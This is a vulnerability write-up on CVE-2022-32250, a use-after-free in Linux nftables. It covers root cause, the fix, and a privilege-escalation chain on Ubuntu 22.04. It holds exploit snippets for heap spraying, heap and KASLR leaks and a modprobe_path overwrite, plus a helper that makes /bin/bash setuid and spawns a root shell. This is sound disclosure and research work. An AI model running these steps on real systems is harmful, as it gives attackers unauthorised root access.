Background
Netfilter is a framework in the Linux kernel for implementing various networking-related tasks with user-defined handlers. It provides functions for packet filtering, network address and port translation, and packet logging. Netfilter exposes a set of hooks that allow other kernel modules to register callback functions in the kernel's networking stack.
nftables is a component of Netfilter that filters or reroutes packets according to user-defined rules. nftables supports sets to make it easier to use multiple IP addresses, port numbers, etc. in a single rule. Sets can be represented using braces when defining rules (e.g., { 22, 80, 443 }), and set types include ipv4_addr, ipv6_addr, ether_addr, inet_proto, inet_service, and mark.
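For example, a single rule can match several TCP ports through an anonymous set; the table and chain names below are illustrative, not taken from the original post:
nft add table inet filter
nft add chain inet filter input '{ type filter hook input priority 0 ; }'
nft add rule inet filter input tcp dport { 22, 80, 443 } accept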
nftables uses tables, chains, rules, and expressions to store and process instructions. Tables contain several chains and are tied to protocol families such as IP and IP6. Chains hold several rules along with the type of network traffic they process. Rules consist of several expressions, and traffic that reaches a chain is evaluated against the rules inside that chain. Expressions evaluate whether the input satisfies a set of conditions. (See also: How-The-Tables-Have-Turned-CVE-2022-1015-1016.)
Root Cause Analysis
The PoC is based on the oss-security report: Linux Kernel use-after-free write in netfilter.
CVE-2022-32250 is a use-after-free vulnerability in the Netfilter subsystem. The vulnerability occurs when a new nft set is added with an NFT_MSG_NEWSET command. When processing lookup and dynset expressions, a freed chunk remains in the set->bindings list due to an incorrect NFT_EXPR_STATEFUL check, which leads to a use-after-free write.
This vulnerability starts from nft_expr_init. nft_expr_init calls nf_tables_expr_parse and allocates memory for an expr. Afterwards, nf_tables_newexpr initializes the expr.
static struct nft_expr *nft_expr_init(const struct nft_ctx *ctx,
                                      const struct nlattr *nla)
{
    struct nft_expr_info expr_info;
    struct nft_expr *expr;
    struct module *owner;
    int err;

    err = nf_tables_expr_parse(ctx, nla, &expr_info);
    if (err < 0)
        goto err1;

    err = -ENOMEM;
    expr = kzalloc(expr_info.ops->size, GFP_KERNEL);
    if (expr == NULL)
        goto err2;

    err = nf_tables_newexpr(ctx, &expr_info, expr);
    if (err < 0)
        goto err3;

    return expr;
err3:
    kfree(expr);
err2:
    owner = expr_info.ops->type->owner;
    if (expr_info.ops->type->release_ops)
        expr_info.ops->type->release_ops(expr_info.ops);
    module_put(owner);
err1:
    return ERR_PTR(err);
}
Since the structure is different depending on the type of expr, a suitable structure is stored in data[]. For example, the lookup expression contains struct nft_lookup in data[].
struct nft_expr {
    const struct nft_expr_ops *ops;
    unsigned char data[]
        __attribute__((aligned(__alignof__(u64))));
};

struct nft_lookup {
    struct nft_set         *set;
    u8                     sreg;
    u8                     dreg;
    bool                   invert;
    struct nft_set_binding binding;
};

struct nft_set_binding {
    struct list_head       list;
    const struct nft_chain *chain;
    u32                    flags;
};
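For reference, nft_expr_priv() (used below in nft_lookup_init) simply returns a pointer to this data[] area; it is defined roughly as follows in include/net/netfilter/nf_tables.h:
static inline void *nft_expr_priv(const struct nft_expr *expr)
{
    /* the type-specific structure (e.g. struct nft_lookup) lives in data[] */
    return (void *)expr->data;
}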
nf_tables_newexpr calls ops->init by referring to the ops of the expr. In the case of lookup, ops->init points to nft_lookup_init.
static int nf_tables_newexpr(const struct nft_ctx *ctx,
                             const struct nft_expr_info *expr_info,
                             struct nft_expr *expr)
{
    const struct nft_expr_ops *ops = expr_info->ops;
    int err;

    expr->ops = ops;
    if (ops->init) {
        err = ops->init(ctx, expr, (const struct nlattr **)expr_info->tb);
        if (err < 0)
            goto err1;
    }
    return 0;
err1:
    expr->ops = NULL;
    return err;
}
nft_lookup_init calls nf_tables_bind_set, which links the expr's binding into set->bindings at [1].
static int nft_lookup_init(const struct nft_ctx *ctx,
                           const struct nft_expr *expr,
                           const struct nlattr * const tb[])
{
    struct nft_lookup *priv = nft_expr_priv(expr);
    u8 genmask = nft_genmask_next(ctx->net);
    struct nft_set *set;
    u32 flags;
    int err;

    if (tb[NFTA_LOOKUP_SET] == NULL ||
        tb[NFTA_LOOKUP_SREG] == NULL)
        return -EINVAL;

    set = nft_set_lookup_global(ctx->net, ctx->table, tb[NFTA_LOOKUP_SET],
                                tb[NFTA_LOOKUP_SET_ID], genmask);
    if (IS_ERR(set))
        return PTR_ERR(set);
    ...
    priv->binding.flags = set->flags & NFT_SET_MAP;

    err = nf_tables_bind_set(ctx, set, &priv->binding);
    if (err < 0)
        return err;

    priv->set = set;
    return 0;
}
int nf_tables_bind_set(const struct nft_ctx *ctx, struct nft_set *set,
                       struct nft_set_binding *binding)
{
    struct nft_set_binding *i;
    struct nft_set_iter iter;

    if (set->use == UINT_MAX)
        return -EOVERFLOW;

    if (!list_empty(&set->bindings) && nft_set_is_anonymous(set))
        return -EBUSY;
    ...
bind:   // [1] bind expr to set->bindings
    binding->chain = ctx->chain;
    list_add_tail_rcu(&binding->list, &set->bindings);
    nft_set_trans_bind(ctx, set);
    set->use++;

    return 0;
}
When nft_expr_init completes, it returns to its caller, nft_set_elem_expr_alloc. If expr->ops->type->flags does not contain NFT_EXPR_STATEFUL, execution jumps to err_set_elem_expr and calls nft_expr_destroy to remove the expression that was just added to the set.
struct nft_expr *nft_set_elem_expr_alloc(const struct nft_ctx *ctx,
                                         const struct nft_set *set,
                                         const struct nlattr *attr)
{
    struct nft_expr *expr;
    int err;

    expr = nft_expr_init(ctx, attr);
    if (IS_ERR(expr))
        return expr;

    err = -EOPNOTSUPP;
    if (!(expr->ops->type->flags & NFT_EXPR_STATEFUL))
        goto err_set_elem_expr;

    if (expr->ops->type->flags & NFT_EXPR_GC) {
        if (set->flags & NFT_SET_TIMEOUT)
            goto err_set_elem_expr;

        if (!set->ops->gc_init)
            goto err_set_elem_expr;

        set->ops->gc_init(set);
    }

    return expr;

err_set_elem_expr:
    nft_expr_destroy(ctx, expr);

    return ERR_PTR(err);
}
Because the expr was bound to the set by nf_tables_bind_set, nft_expr_destroy calls nf_tables_expr_destroy to tear the expression down before freeing it.
void nft_expr_destroy(const struct nft_ctx *ctx, struct nft_expr *expr)
{
    nf_tables_expr_destroy(ctx, expr);
    kfree(expr);
}
nf_tables_expr_destroy calls expr->ops->destroy. For the lookup expression, ops->destroy points to nft_lookup_destroy.
static void nf_tables_expr_destroy(const struct nft_ctx *ctx,
                                   struct nft_expr *expr)
{
    const struct nft_expr_type *type = expr->ops->type;

    if (expr->ops->destroy)
        expr->ops->destroy(ctx, expr);
    module_put(type->owner);
}
nft_lookup_destroy calls nf_tables_destroy_set, which tries to destroy the set. However, set->bindings still contains the previously bound expr, so nft_set_destroy is not called. As a result, the set remains as it is, and the expr is still linked into the set's bindings list.
static void nft_lookup_destroy(const struct nft_ctx *ctx,
                               const struct nft_expr *expr)
{
    struct nft_lookup *priv = nft_expr_priv(expr);

    nf_tables_destroy_set(ctx, priv->set);
}

void nf_tables_destroy_set(const struct nft_ctx *ctx, struct nft_set *set)
{
    if (list_empty(&set->bindings) && nft_set_is_anonymous(set))
        nft_set_destroy(ctx, set);
}
Although the expr remains on the list, nft_expr_destroy frees the allocated expr at [2]. So, if we try to bind another expr to that set again, a use-after-free write occurs.
void nft_expr_destroy(const struct nft_ctx *ctx, struct nft_expr *expr)
{
    nf_tables_expr_destroy(ctx, expr);
    kfree(expr); // [2] UAF occurred!
}
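To make the primitive concrete, here is a schematic userspace illustration (our own sketch, not kernel code): a node is freed while still linked into a doubly linked list, the allocator reuses the chunk, and the next insertion writes a pointer into the reused object, just as binding a second expression writes into whatever now occupies the freed nft_expr chunk. Whether the chunk is reused immediately depends on the allocator; glibc's tcache typically reuses it right away.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

struct list_head { struct list_head *next, *prev; };

static void list_add_tail(struct list_head *new, struct list_head *head)
{
    new->prev = head->prev;
    new->next = head;
    head->prev->next = new;      /* writes into the stale tail node */
    head->prev = new;
}

struct binding { struct list_head list; };  /* stands in for nft_set_binding */
struct victim  { char data[16]; };          /* stands in for the reused chunk */

int main(void)
{
    struct list_head bindings = { &bindings, &bindings };  /* set->bindings */

    struct binding *b1 = malloc(sizeof(*b1));
    list_add_tail(&b1->list, &bindings);    /* expr 1 bound to the set */

    free(b1);                               /* expr 1 freed, but still on the list */

    struct victim *v = malloc(sizeof(*v));  /* allocator reuses the freed chunk */
    memcpy(v->data, "AAAAAAAAAAAAAAA", 16);

    struct binding *b2 = malloc(sizeof(*b2));
    list_add_tail(&b2->list, &bindings);    /* expr 2 bound: writes &b2->list into
                                             * the stale node, i.e. into v */
    printf("victim now contains a pointer: %p\n", *(void **)v->data);
    return 0;
}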
Exploitation
The exploitation is performed on Ubuntu 22.04 with a 5.15.0-27-generic kernel.
The exploit has three main steps:
- Leak a heap address using struct user_key_payload.
- Leak a kernel text address using mqueue to defeat KASLR.
- Overwrite modprobe_path.
Leak Heap Address
For Linux kernel exploitation, struct msg_msg is a widely used primitive since it can perform both arbitrary reads and writes by modifying its size field.
On the 5.15.0-27-generic kernel, struct msg_msg is allocated with GFP_KERNEL_ACCOUNT, while struct nft_lookup is allocated with GFP_KERNEL. If the GFP_KERNEL_ACCOUNT flag is set, the kernel uses the kmalloc-cg-xx slabs; with GFP_KERNEL, it uses the kmalloc-xx slabs, so the two objects never share a cache.
For this reason, we used the user keyring to leak information (see CVE-2022-34918-LPE-PoC). A user key uses struct user_key_payload, which has the following layout. We can control the size of the allocation by changing datalen.
struct user_key_payload {
    struct rcu_head rcu;
    unsigned short  datalen;
    char            data[] __aligned(__alignof__(u64));
};

struct callback_head {
    struct callback_head *next;
    void (*func)(struct callback_head *head);
} __attribute__((aligned(sizeof(void *))));
#define rcu_head callback_head
struct user_key_payload is allocated in user_preparse.
int user_preparse(struct key_preparsed_payload *prep)
{
    struct user_key_payload *upayload;
    size_t datalen = prep->datalen;

    if (datalen <= 0 || datalen > 32767 || !prep->data)
        return -EINVAL;

    upayload = kmalloc(sizeof(*upayload) + datalen, GFP_KERNEL);
    if (!upayload)
        return -ENOMEM;
    ...
    return 0;
}
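From userspace, such objects can be sprayed with the keyutils API. A minimal sketch, assuming libkeyutils is available; the description strings and payload size are illustrative, chosen so that 0x18 + datalen lands in the same kmalloc-64 cache as the freed nft_expr chunk:
#include <keyutils.h>
#include <stdio.h>
#include <string.h>

/* Spray user_key_payload objects into kmalloc-64:
 * allocation size is sizeof(struct user_key_payload) (0x18) + plen. */
int main(void)
{
    char payload[40];
    memset(payload, 'A', sizeof(payload));

    for (int i = 0; i < 64; i++) {
        char desc[32];
        snprintf(desc, sizeof(desc), "spray_key_%d", i);
        key_serial_t id = add_key("user", desc, payload, sizeof(payload),
                                  KEY_SPEC_PROCESS_KEYRING);
        if (id < 0)
            perror("add_key");
    }
    return 0;
}
Compile with -lkeyutils.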
struct user_key_payload overlaps with the UAF'd chunk generated as described previously. user_key_payload has a data field that starts at offset 0x18, so arbitrary R/W inside the chunk is possible. Also, the UAF chunk (struct nft_lookup) contains a linked list. For this reason, if the UAF is triggered twice, the address of the second UAF chunk is written at the linked-list location of the chunk where the UAF first occurred. In other words, the UAF write stores another UAF address in nft_lookup->binding.list.next, which corresponds to the user_key_payload->data[0:8] field. Consequently, it is possible to leak heap addresses by reading user_key_payload->data (a userspace sketch follows the layout below).
struct user_key_payload {
    struct rcu_head rcu;                                  /* offset 0x00, size 0x10 */
    unsigned short  datalen;                              /* offset 0x10, size 0x02 */
    /* padding */
    char            data[] __aligned(__alignof__(u64));   /* offset 0x18 */
};
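Reading the key back returns data[] to userspace, so the overlapping pointer leaks out. A minimal sketch, assuming the key ID of the sprayed key overlapping the UAF chunk is known:
#include <keyutils.h>
#include <stdint.h>
#include <stdio.h>

/* Read the payload of the key that overlaps the UAF chunk:
 * data[0:8] now holds the list pointer written into the freed nft_lookup,
 * i.e. a kernel heap address. */
void leak_heap(key_serial_t id)
{
    uint64_t buf[5] = {0};                 /* datalen was 40 bytes in the spray */

    if (keyctl_read(id, (char *)buf, sizeof(buf)) < 0) {
        perror("keyctl_read");
        return;
    }
    printf("leaked heap pointer: 0x%lx\n", (unsigned long)buf[0]);
}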
Leak KASLR
msg_msg is widely used to exploit the Linux kernel. However, this vulnerability only allows a write at offset 0x18 of an object, so it is hard to exploit with the existing method. Fortunately, the mqueue code in the Linux kernel has functions suitable for exploitation. An mqueue manages multiple messages through struct posix_msg_tree_node, which is allocated at [3].
static int do_mq_timedsend(mqd_t mqdes, const char __user *u_msg_ptr,
                           size_t msg_len, unsigned int msg_prio,
                           struct timespec64 *ts)
{
    struct fd f;
    struct inode *inode;
    struct ext_wait_queue wait;
    struct ext_wait_queue *receiver;
    struct msg_msg *msg_ptr;
    struct mqueue_inode_info *info;
    ktime_t expires, *timeout = NULL;
    struct posix_msg_tree_node *new_leaf = NULL;
    int ret = 0;
    DEFINE_WAKE_Q(wake_q);

    if (unlikely(msg_prio >= (unsigned long) MQ_PRIO_MAX))
        return -EINVAL;

    if (ts) {
        expires = timespec64_to_ktime(*ts);
        timeout = &expires;
    }
    ...
    msg_ptr = load_msg(u_msg_ptr, msg_len);
    if (IS_ERR(msg_ptr)) {
        ret = PTR_ERR(msg_ptr);
        goto out_fput;
    }
    msg_ptr->m_ts = msg_len;
    msg_ptr->m_type = msg_prio;

    if (!info->node_cache)
        new_leaf = kmalloc(sizeof(*new_leaf), GFP_KERNEL); // [3] allocate new_leaf
    ...
struct posix_msg_tree_node is allocated in kmalloc-64 and is defined as follows. The size of struct rb_node is 0x18, so msg_list.next sits at offset 0x18.
struct posix_msg_tree_node {
    struct rb_node   rb_node;
    struct list_head msg_list;
    int              priority;
};

struct rb_node {
    unsigned long  __rb_parent_color;
    struct rb_node *rb_right;
    struct rb_node *rb_left;
} __attribute__((aligned(sizeof(long))));
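From userspace, a posix_msg_tree_node (and the accompanying msg_msg) is allocated simply by creating a POSIX message queue and sending to it. A minimal sketch; the queue name, sizes, and priority are illustrative:
#include <fcntl.h>
#include <mqueue.h>
#include <stdio.h>
#include <string.h>

/* Sending the first message of a given priority makes do_mq_timedsend()
 * allocate a struct posix_msg_tree_node (kmalloc-64) at [3]. */
int main(void)
{
    struct mq_attr attr = {
        .mq_maxmsg  = 8,
        .mq_msgsize = 0x40,   /* keep the msg_msg allocation small as well */
    };
    mqd_t q = mq_open("/uaf_queue", O_CREAT | O_RDWR, 0600, &attr);
    if (q == (mqd_t)-1) {
        perror("mq_open");
        return 1;
    }

    char msg[0x10];
    memset(msg, 'B', sizeof(msg));
    if (mq_send(q, msg, sizeof(msg), 1) < 0)
        perror("mq_send");
    return 0;
}
Compile with -lrt.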
In the figure below, UAF 1 and UAF 2 are the first and second use-after-free'd struct nft_expr, respectively. Each struct nft_expr contains a struct nft_lookup in nft_expr->data.
If we allocate UAF 1 and UAF 2 in a particular order, they will be connected as shown below.
- Allocate the UAF 1 chunk with the vulnerability.
- Overlap struct posix_msg_tree_node with UAF 1 by using the do_mq_timedsend function.
- Trigger the vulnerability again to create UAF 2; this writes (UAF 1)->binding->next = (UAF 2)->binding.
- Overlap struct user_key_payload with UAF 2 by using the keyctl function.
UAF 1 UAF 2
------------------------------- -------------------------------
0x0 | rb color | rb_right | | rcu->next | rcu->func ptr |
--------------- --------------- --------------- ---------------
0x10 | rb_left | (UAF 2+0x18) | | data_len | data[0] |
--------------- --------------- --------------- ---------------
0x20 | .... | .... | | data[1] | data[2] |
--------------- --------------- --------------- ---------------
0x30 | .... | .... | | data[3] | data[4] |
--------------- --------------- --------------- ---------------
UAF 1 overlap info: struct nft_expr == struct posix_msg_tree_node
UAF 2 overlap info: struct nft_expr == struct user_key_payload
In this case, msg_list->next of struct posix_msg_tree_node becomes UAF 2 + 0x18, and this msg_list is treated as a list of struct msg_msg. Therefore, the data[] of UAF 2 overlaps with a fake struct msg_msg, laid out as follows:
data[0] = m_list->next / data[1] = m_list->prev / data[2] = m_type / data[3] = m_ts
struct msg_msg {
    struct list_head m_list;
    long m_type;
    size_t m_ts;              /* message text size */
    struct msg_msgseg *next;
    void *security;
    /* the actual message follows immediately */
};
Accordingly, the fields of this fake struct msg_msg can be controlled. However, copy_to_user cannot copy more than the slab size (currently kmalloc-64), so KASLR can only be leaked when a suitable structure is allocated directly below UAF 2.
Previously, struct percpu_ref_data was used for KASLR leaks in kmalloc-64. Unfortunately, the free_msg function performs kfree(msg_msg->security). If struct percpu_ref_data is allocated below UAF 2, the kernel crashes at kfree(count) because the count assigned by the io_uring functions is 0x8000000000000001. Therefore, we use struct user_key_payload again.
struct percpu_ref_data {
    atomic_long_t     count;
    percpu_ref_func_t *release;
    percpu_ref_func_t *confirm_switch;
    bool              force_atomic:1;
    bool              allow_reinit:1;
    struct rcu_head   rcu;
    struct percpu_ref *ref;
};
struct user_key_payload begins with a struct rcu_head. struct rcu_head is designed to wait for a critical section (an RCU grace period) to end; when it ends, a callback function (rcu->func()) is called, and rcu_head stores the address of another rcu_head in its next pointer. Therefore, if such a chunk sits directly below UAF 2, a KASLR leak can be performed.
struct user_key_payload {
    struct rcu_head rcu;
    unsigned short  datalen;
    char            data[] __aligned(__alignof__(u64));
};

struct callback_head {
    struct callback_head *next;
    void (*func)(struct callback_head *head);
} __attribute__((aligned(sizeof(void *))));
#define rcu_head callback_head
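The post does not spell out how rcu->func comes to hold a kernel text pointer here. One plausible way (our assumption, not stated in the post) is to revoke the neighbouring user key: user_revoke() hands the payload to call_rcu() with the kernel function user_free_payload_rcu as the callback, so offset 0x8 of that chunk then contains a kernel text address.
#include <keyutils.h>
#include <stdio.h>

/* Assumption: revoking the key allocated below UAF 2 queues its payload via
 * call_rcu(&upayload->rcu, user_free_payload_rcu), so rcu->func (offset 0x8
 * of the chunk) now holds a kernel text address that can be leaked. */
void arm_kaslr_leak(key_serial_t neighbour_key)
{
    if (keyctl_revoke(neighbour_key) < 0)
        perror("keyctl_revoke");
}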
The function do_mq_timedreceive is used to read a struct msg_msg from the mqueue. do_mq_timedreceive calls msg_get to fetch a struct msg_msg [4]. msg_get walks to the leaf node, takes the first struct msg_msg [5], and calls list_del [6] to unlink it from the list. Afterwards, store_msg runs copy_to_user to send the data to userspace [7]. Then, free_msg frees the struct msg_msg and msg_msg->security [8]. The KASLR leak is possible because the returned msg_msg data contains a function address: rcu->func. (A userspace sketch of the receive side follows the kernel code below.)
static int do_mq_timedreceive(mqd_t mqdes, char __user *u_msg_ptr,
                              size_t msg_len, unsigned int __user *u_msg_prio,
                              struct timespec64 *ts)
{
    ssize_t ret;
    struct msg_msg *msg_ptr;
    struct fd f;
    struct inode *inode;
    struct mqueue_inode_info *info;
    struct ext_wait_queue wait;
    ktime_t expires, *timeout = NULL;
    struct posix_msg_tree_node *new_leaf = NULL;

    if (ts) {
        expires = timespec64_to_ktime(*ts);
        timeout = &expires;
    }
    ...
    else {
        DEFINE_WAKE_Q(wake_q);

        msg_ptr = msg_get(info); // [4] try to get msg_msg from leaf node

        inode->i_atime = inode->i_mtime = inode->i_ctime =
                current_time(inode);

        /* There is now free space in the queue. */
        pipelined_receive(&wake_q, info);
        spin_unlock(&info->lock);
        wake_up_q(&wake_q);
        ret = 0;
    }
    if (ret == 0) {
        ret = msg_ptr->m_ts;

        if ((u_msg_prio && put_user(msg_ptr->m_type, u_msg_prio)) ||
            store_msg(u_msg_ptr, msg_ptr, msg_ptr->m_ts)) { // [7] read data from msg_msg, call copy_to_user
            ret = -EFAULT;
        }
        free_msg(msg_ptr); // [8] kfree msg_msg and msg_msg->security
    }

out_fput:
    fdput(f);
out:
    return ret;
}
static inline struct msg_msg *msg_get(struct mqueue_inode_info *info)
{
    struct rb_node *parent = NULL;
    struct posix_msg_tree_node *leaf;
    struct msg_msg *msg;

try_again:
    /*
     * During insert, low priorities go to the left and high to the
     * right.  On receive, we want the highest priorities first, so
     * walk all the way to the right.
     */
    parent = info->msg_tree_rightmost;
    ...
    } else {
        msg = list_first_entry(&leaf->msg_list,  // [5] extract msg_msg at the front of list
                               struct msg_msg, m_list);
        list_del(&msg->m_list);                  // [6] remove msg_msg from list
        if (list_empty(&leaf->msg_list)) {
            msg_tree_erase(leaf, info);
        }
    }
    info->attr.mq_curmsgs--;
    info->qsize -= msg->m_ts;
    return msg;
}
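From userspace, this path is driven with a single receive on the queue. A minimal sketch (the queue handle and buffer size are illustrative); the bytes copied back come from the fake msg_msg's message body and contain the rcu->func pointer described above:
#include <mqueue.h>
#include <stdio.h>

/* Receive through the fake msg_msg: copy_to_user() in store_msg() copies the
 * message body, which overlaps the chunk below UAF 2, leaking its rcu fields
 * (rcu->func is a kernel text address usable to compute the KASLR slide). */
void leak_kaslr(mqd_t q)
{
    unsigned long qwords[8] = {0};   /* must be >= mq_msgsize of the queue */
    unsigned int prio;

    if (mq_receive(q, (char *)qwords, sizeof(qwords), &prio) < 0) {
        perror("mq_receive");
        return;
    }

    /* The exact offset of rcu->func in the returned bytes depends on the
     * overlap layout; dump the first qwords and look for a kernel text
     * pointer (0xffffffff8.......). */
    for (int i = 0; i < 4; i++)
        printf("qword %d: 0x%016lx\n", i, qwords[i]);
}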
Overwrite modprobe_path
In the msg_get function, list_del unlinks the struct msg_msg from the linked list. The unlink performs the writes msg->prev->next = msg->next and msg->next->prev = msg->prev.
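For reference, the unlink in list_del() boils down to roughly the following (from include/linux/list.h):
static inline void __list_del(struct list_head *prev, struct list_head *next)
{
    next->prev = prev;             /* *(msg->next + 8) = msg->prev */
    WRITE_ONCE(prev->next, next);  /* *(msg->prev)     = msg->next */
}
Both msg->next and msg->prev come from data[0] and data[1] of UAF 2, so both the target address and the written value are attacker-controlled; however, each value must itself be a writable kernel address, since both halves of the unlink dereference them.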
UAF 1 UAF 2
------------------------------- -------------------------------
0x0 | rb color | rb_right | | rcu->next | rcu->func ptr |
--------------- --------------- --------------- ---------------
0x10 | rb_left | (UAF 2+0x18) | | data_len | data[0] |
--------------- --------------- --------------- ---------------
0x20 | .... | .... | | data[1] | data[2] |
--------------- --------------- --------------- ---------------
0x30 | .... | .... | | data[3] | data[4] |
--------------- --------------- --------------- ---------------
UAF 1 overlap info: struct nft_expr == struct posix_msg_tree_node
UAF 2 overlap info: struct nft_expr == struct user_key_payload
data[0] = m_list->next / data[1] = m_list->prev / data[2] = m_type / data[3] = m_ts
struct msg_msg {
    struct list_head m_list;
    long m_type;
    size_t m_ts;              /* message text size */
    struct msg_msgseg *next;
    void *security;
    /* the actual message follows immediately */
};
The base address of the kernel's heap has the form 0xffff????00000000. Therefore, we can write a value of the form 0xffff????xxxxxxxx, where the low four bytes are our input, at any kernel address (the value itself is dereferenced by the other half of the unlink, so it must be a mapped kernel address, which is why its upper bytes stay fixed).
modprobe_path initially contains /sbin/modprobe. If data[0] and data[1] are set to (modprobe_path + 0x1 - 0x8) and 0xffff????2f706d74, the unlink writes 0xffff????2f706d74 at modprobe_path + 0x1 (0x2f706d74 is "/pmt", i.e. "tmp/" once stored little-endian). We already know ???? from the heap leak. As a result, modprobe_path can be changed into /tmp/????\xff\xffprobe.
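Once modprobe_path points at the attacker-controlled file name, the usual trick applies: drop a script at that path and execute a file with an unknown format so that the kernel runs modprobe_path as root. A minimal sketch; get_root() and the trigger file name are hypothetical, and the exact /tmp/... name must be rebuilt from the leaked heap bytes:
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* Hypothetical helper: 'hijacked_path' is the /tmp/????\xff\xffprobe name
 * reconstructed from the heap leak. */
void get_root(const char *hijacked_path)
{
    /* The script the kernel will run as root via modprobe_path. */
    int fd = open(hijacked_path, O_WRONLY | O_CREAT | O_TRUNC, 0755);
    dprintf(fd, "#!/bin/sh\nchmod u+s /bin/bash\n");
    close(fd);

    /* A file with an unknown binary format: executing it makes the kernel
     * call request_module("binfmt-...."), which execs modprobe_path. */
    fd = open("/tmp/trigger", O_WRONLY | O_CREAT | O_TRUNC, 0755);
    write(fd, "\xde\xad\xbe\xef", 4);
    close(fd);

    system("/tmp/trigger >/dev/null 2>&1");
    system("/bin/bash -p");   /* setuid bash -> root shell */
}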
Full exploit code is available at our GitHub repo. Note that it is intended for educational/research purposes only, and you may not use it to cause any harm or damage.
Patch
nft_expr_init should check expr_info.ops->type->flags and allocate the expr chunk only when the NFT_EXPR_STATEFUL flag is set.
diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
index 12fc9cda4a2cf..f296dfe86b622 100644
--- a/net/netfilter/nf_tables_api.c
+++ b/net/netfilter/nf_tables_api.c
@@ -2873,27 +2873,31 @@ static struct nft_expr *nft_expr_init(const struct nft_ctx *ctx,
     err = nf_tables_expr_parse(ctx, nla, &expr_info);
     if (err < 0)
-        goto err1;
+        goto err_expr_parse;
+
+    err = -EOPNOTSUPP;
+    if (!(expr_info.ops->type->flags & NFT_EXPR_STATEFUL))
+        goto err_expr_stateful;

     err = -ENOMEM;
     expr = kzalloc(expr_info.ops->size, GFP_KERNEL_ACCOUNT); // the upstream commit targets a newer kernel,
     if (expr == NULL)                                        // so the allocation flag is already GFP_KERNEL_ACCOUNT
-        goto err2;
+        goto err_expr_stateful;

     err = nf_tables_newexpr(ctx, &expr_info, expr);
     if (err < 0)
-        goto err3;
+        goto err_expr_new;

     return expr;
-err3:
+err_expr_new:
     kfree(expr);
-err2:
+err_expr_stateful:
     owner = expr_info.ops->type->owner;
     if (expr_info.ops->type->release_ops)
         expr_info.ops->type->release_ops(expr_info.ops);
     module_put(owner);
-err1:
+err_expr_parse:
     return ERR_PTR(err);
 }

@@ -5413,9 +5417,6 @@ struct nft_expr *nft_set_elem_expr_alloc(const struct nft_ctx *ctx,
         return expr;

     err = -EOPNOTSUPP;
-    if (!(expr->ops->type->flags & NFT_EXPR_STATEFUL))
-        goto err_set_elem_expr;
-
     if (expr->ops->type->flags & NFT_EXPR_GC) {
         if (set->flags & NFT_SET_TIMEOUT)
             goto err_set_elem_expr;
Conclusion
In this post, we have shown the process of exploiting CVE-2022-32250. We were able to leak KASLR and overwrite modprobe_path by utilizing the mqueue functions, and as a result, we successfully gained root privileges on Ubuntu 22.04.